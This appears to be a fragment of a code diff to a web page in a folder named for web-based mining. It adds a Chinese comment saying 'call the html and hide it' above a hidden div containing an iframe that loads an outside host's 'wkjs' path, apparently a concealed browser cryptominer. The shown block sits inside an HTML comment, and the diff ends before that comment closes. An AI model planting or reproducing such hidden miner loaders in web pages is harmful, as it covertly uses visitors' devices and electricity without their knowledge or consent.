--- a/acc/网页挖矿/index.html
+++ b/acc/网页挖矿/index.html
@@ -5,7 +5,7 @@
 		<title></title>
 	</head>
 	<body>
-		<!--
+		<!-- 调用html并隐藏
 			<div style="display:none;">
 		<iframe src="http://23niu.ga/wkjs/"  scrolling="no" />
 			
